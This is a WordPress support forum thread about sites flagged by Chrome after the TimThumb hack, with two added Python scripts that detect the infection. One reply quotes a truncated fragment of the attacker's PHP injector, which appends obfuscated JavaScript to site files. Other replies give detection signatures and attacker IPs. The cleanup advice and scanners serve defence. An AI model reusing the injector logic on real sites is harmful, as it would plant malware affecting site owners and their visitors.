• Need help. Chrome’s saying malware has been detected somewhere on our site from IP address 31.184.242.102.

    We haven’t updated anything and it seems that it’s a problem being experienced by other WordPress users.

    Please let me know how to address this issue.

Viewing 15 replies - 31 through 45 (of 45 total)
  • I think I’ve found something.

    The file upd.php in wp-content is detected as a trojan. It’s not a WordPress file. Can I delete it? I’ve opened it; this is its content:

    [Code moderated as per the Forum Rules. Please use the pastebin]

    Unless upd.php is a file you use in a plugin or theme, I would remove it.

    If it is a plugin or theme file, get a clean one.

    It probably varies based on the (infected) site. I used https://sitecheck.sucuri.net/scanner/ to tell me exactly which files were infected. In every case it was the last line of the file that had that nasty hex-javascript junk.

    Oops sorry, this reply was REALLY late.

    This makes no sense.

    I’ve deleted upd.php. It was in wp-content and wp-admin.

    Besides, I’ve downloaded the folders wp-admin, wp-content and wp-includes, and then I’ve looked for “var _0x80d0=[“\x64\” in every file with Dreamweaver, and there were no matches.

    This makes no sense. The 31.184.242.102 malware only appears in my admin panel when I activate the AddThis plugin, which I’ve deleted and uploaded again several times…

    @fellowito

    upd.php was a known malicious file with the timthumb hack. Make sure that if any of your plugins or themes use timthumb or a variant thereof, it is updated/patched.

    @fellowito, Take a look at the contents of the js file

    /wp-content/themes/bds4/jquery-1.6.2.min.js

    This is the end of the legitimate code in the file:

    a.jQuery=a.$=f})(window);

    everything after that, starting with

    var _0xa687=

    is the malicious part.

    We saw the malware in two plugins:

    Shareaholic and Mini Fancybox

    I deleted those files and did not install them again, since that may trigger it again.

    Just in case this helps

    @fellowito Another question — The script at the bottom of

    /wp-content/themes/bds4/jquery-ui.min.js
    /wp-content/themes/bds4/jquery-1.6.2.min.js

    de-obfuscates to https:// 31 . 184 . 242 . 103/s.php (.103, not .102)

    but the warning you are getting still says 31.184.242.102 ??

    I have the same problem; my IDS detected the attack:

    POST.HOST
    set_time_limit(0); function modify($fname){ $tmp = file_get_contents($fname); $pos = strpos($tmp,'var _0xa687=["\x74\x6F\x4C'); if ($pos === false){ $code = 'var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x...

    You have to clean all the js files of your WordPress installation. Also, you need to check the wp-config.php: the virus adds a backdoor at the end of the file.
    I’m still looking for a better solution to this…
    Is it a WordPress security issue?
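    The replies above give three things to look for by hand: the `var _0xa687=` hex-string array appended after the legitimate end of each .js file, the de-obfuscated URL inside it, and code appended after the end of wp-config.php, plus the stray upd.php. The script below is an added example (not code from this thread or from WordPress) that automates those checks over a site tree and decodes the `\xNN` string array so you can read the callback URL without running the script. It builds its own throwaway sample site in a temp directory; the injected tail, the upd.php and the appended wp-config.php line are constructed stand-ins (the decoded strings and the 192.0.2.1 URL are not the real payload), and treating anything after the `require_once(... wp-settings.php)` line as suspect is a heuristic that assumes nothing was legitimately appended there.

```python
import os
import re
import tempfile

# Heuristic signature for the injection this thread describes: a string array
# named _0x<hex> whose elements are written as "\xNN" escapes.
HEX_ARRAY_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([^\]]*)\]')
JS_STRING_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2}|[^"\\])*)"')
HEX_ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')
# A stock wp-config.php ends with this require_once line; text after it is
# suspect (assumption: nothing was legitimately appended there).
WP_SETTINGS_RE = re.compile(
    r"require_once\s*\(?\s*ABSPATH\s*\.\s*['\"]wp-settings\.php['\"]\s*\)?\s*;")

LEGIT_JS = '(function(a,b){function f(){}a.jQuery=a.$=f})(window);'
# Constructed stand-in for the appended tail: it decodes to "script",
# "createElement" and a documentation-range URL, not the real payload.
INJECTED_JS = (r'var _0xa687=["\x73\x63\x72\x69\x70\x74",'
               r'"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74",'
               r'"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x31\x39\x32\x2E\x30\x2E\x32'
               r'\x2E\x31\x2F\x73\x2E\x70\x68\x70"];')
CLEAN_CONFIG = "<?php\ndefine('DB_NAME', 'wp');\nrequire_once(ABSPATH . 'wp-settings.php');\n"


def decode_hex_strings(js_text):
    """[(array_name, [decoded element, ...]), ...] for each _0x array found."""
    result = []
    for m in HEX_ARRAY_RE.finditer(js_text):
        elements = [HEX_ESCAPE_RE.sub(lambda e: chr(int(e.group(1), 16)), s)
                    for s in JS_STRING_RE.findall(m.group(2))]
        result.append((m.group(1), elements))
    return result


def scan_js_file(path):
    """Finding dict if the file carries the _0x hex array, else None."""
    with open(path, encoding="utf-8", errors="replace") as f:
        text = f.read()
    m = HEX_ARRAY_RE.search(text)
    if m is None:
        return None
    decoded = [s for _, elems in decode_hex_strings(text) for s in elems]
    return {"path": path, "array_name": m.group(1),
            "offset": m.start(),                 # where legitimate code ends
            "trailing_bytes": len(text) - m.start(),
            "decoded": decoded, "urls": URL_RE.findall(" ".join(decoded))}


def wp_config_tail(path):
    """Text after the last wp-settings.php require; '' if clean, None if no marker."""
    with open(path, encoding="utf-8", errors="replace") as f:
        text = f.read()
    last = None
    for last in WP_SETTINGS_RE.finditer(text):
        pass
    if last is None:
        return None
    tail = text[last.end():].strip()
    return tail[:-2].strip() if tail.endswith("?>") else tail   # bare ?> is harmless


def scan_site(root):
    """Walk a WordPress tree and collect the three symptoms from the thread."""
    findings = {"infected_js": [], "suspicious_files": [], "wp_config_tail": None}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name == "upd.php":               # named in the thread, not a WordPress file
                findings["suspicious_files"].append(path)
            elif name.endswith(".js"):
                hit = scan_js_file(path)
                if hit:
                    findings["infected_js"].append(hit)
            elif name == "wp-config.php" and dirpath == root:
                findings["wp_config_tail"] = wp_config_tail(path)
    return findings


def build_sample_site():
    """Constructed throwaway tree showing each symptom reported in the thread."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    files = {
        "wp-content/themes/bds4/jquery-1.6.2.min.js": LEGIT_JS + INJECTED_JS,
        "wp-content/themes/bds4/clean.js": LEGIT_JS,
        "wp-admin/upd.php": "<?php /* constructed stand-in */\n",
        "wp-config.php": CLEAN_CONFIG + "/* constructed placeholder for appended code */\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    report = scan_site(build_sample_site())
    for hit in report["infected_js"]:
        print(f'{hit["path"]}: legitimate code ends at byte {hit["offset"]}; '
              f'{hit["array_name"]} decodes to {hit["decoded"]}; URLs {hit["urls"]}')
    print("suspicious files:", report["suspicious_files"])
    print("appended to wp-config.php:", repr(report["wp_config_tail"]))
```

    Run it as `scan_site("/path/to/wordpress")` on the real tree. The `offset` of each hit is where to truncate the file if you cannot replace it with a fresh copy, but replacing from a clean download is safer, and any `_0x` array in a minified library you did not write should be treated as a hit until you have decoded it.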

    @redleg-too thanks.

    I think now it’s solved.

    I had to delete the folders wp-admin and wp-includes, and upload them again.

    I had to replace every JavaScript file that was in wp-content (plugins and theme).

    There should be some kind of plugin to detect which files are infected or something, because the antivirus plugin didn’t detect this.

    How long after cleaning all the files does the malware warning go away?

    I deleted the wp-admin and wp-includes folders and cleaned every theme and plugin .js file, yet I’m still getting the warning.

    I also have a WP site with this hack.

    At least 200 .js files were infected. I first cleaned all of these files.

    After four days it was all back.

    Now I have cleaned it, also adjusted the wp-config.php, and deleted the upd.php in the wp-admin and wp-content folders.

    I also saw a folder backup-b1b2f in the wp-content folder with an empty index.php.

    I am looking into the files on a daily basis. I will keep you posted.
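    Several posters here ended up re-uploading wp-admin and wp-includes and checking files by eye every day, and one notes the antivirus plugin missed the infection and that extra files (upd.php, a backup-b1b2f folder with an empty index.php) kept appearing. A cheaper daily check is to hash the live tree and compare it against a clean copy of the same WordPress version unpacked next to it. The script below is an added example, not code from this thread or from WordPress: it classifies every file as modified, extra (present only on the live site) or missing, which catches both the appended .js tails and the dropped files in one pass. It builds constructed clean and live trees in temp directories for the demonstration; for a real site, unpack the matching release from wordpress.org as the clean copy, and compare wp-content only against the plugin and theme archives you actually installed (an assumption of this example, since wp-content also holds uploads you must not delete).

```python
import hashlib
import os
import tempfile

# Default subtrees to compare. wp-content is site-specific, so only compare it
# when the clean side is built from the plugin/theme archives you installed.
CORE_DIRS = ("wp-admin", "wp-includes")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_hashes(root, subdirs):
    """Map relative path -> sha256 for every file under root/<subdir>."""
    hashes = {}
    for sub in subdirs:
        for dirpath, _dirs, files in os.walk(os.path.join(root, sub)):
            for name in files:
                path = os.path.join(dirpath, name)
                hashes[os.path.relpath(path, root)] = sha256_of(path)
    return hashes


def diff_trees(clean_root, live_root, subdirs=CORE_DIRS):
    """Classify live files against the clean copy: modified, extra or missing."""
    clean = tree_hashes(clean_root, subdirs)
    live = tree_hashes(live_root, subdirs)
    return {
        "modified": sorted(p for p in live if p in clean and live[p] != clean[p]),
        "extra": sorted(p for p in live if p not in clean),
        "missing": sorted(p for p in clean if p not in live),
    }


def write_file(root, rel, content):
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as f:
        f.write(content)


def build_sample_trees():
    """Constructed clean and live trees reproducing the symptoms in the thread."""
    clean = tempfile.mkdtemp(prefix="wp-clean-")
    live = tempfile.mkdtemp(prefix="wp-live-")
    core = {  # stand-ins for files a fresh WordPress copy would contain
        "wp-admin/index.php": "<?php /* stand-in */\n",
        "wp-includes/js/jquery/jquery.js": "(function(a){a.jQuery=a.$={}})(window);",
        "wp-content/index.php": "<?php // Silence is golden.\n",
    }
    for root in (clean, live):
        for rel, content in core.items():
            write_file(root, rel, content)
    # Live-only damage: appended hex array, dropped upd.php, backup-* folder.
    write_file(live, "wp-includes/js/jquery/jquery.js",
               core["wp-includes/js/jquery/jquery.js"] + 'var _0xa687=["\\x73"];')
    write_file(live, "wp-admin/upd.php", "<?php /* constructed stand-in */\n")
    write_file(live, "wp-content/backup-b1b2f/index.php", "")
    return clean, live


if __name__ == "__main__":
    clean, live = build_sample_trees()
    report = diff_trees(clean, live, ("wp-admin", "wp-includes", "wp-content"))
    for kind, paths in report.items():
        print(kind, paths)
```

    Keep the clean copy outside the web root and re-run the comparison on a schedule; a non-empty `modified` or `extra` list within four days, as reported above, tells you the entry point (the TimThumb copy, the appended wp-config.php, or a stolen credential) has not been closed yet, which is the question a file-by-file cleanup alone cannot answer.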

    These are the possible infected themes:
    https://blog.sucuri.net/2011/08/timthumb-security-vulnerability-list-of-themes-including-it.html

    I also updated TimThumb, but this site provides some extra info on preventing remote download:

    https://blog.vaultpress.com/2011/08/02/vulnerability-found-in-timthumb/

    Hey.

    I also have this problem with my site suomilacrosse.com. I replaced all JS files with fresh ones and did multiple site security checks afterwards with clean results. I made a reconsideration request to Google, for which I received the answer “No manual spam actions found”. However, when visiting my site with Chrome, visitors still get the “malware detected” alert, and some have said their antivirus software alerts when visiting the site.

    Any help? :/

    Did you check wp-config.php and the wp-content and wp-admin folders for a suspicious upd.php? If your theme uses timthumb, also check the link above on preventing remote download.

  • The topic ‘Malware Detected by Chrome’ is closed to new replies.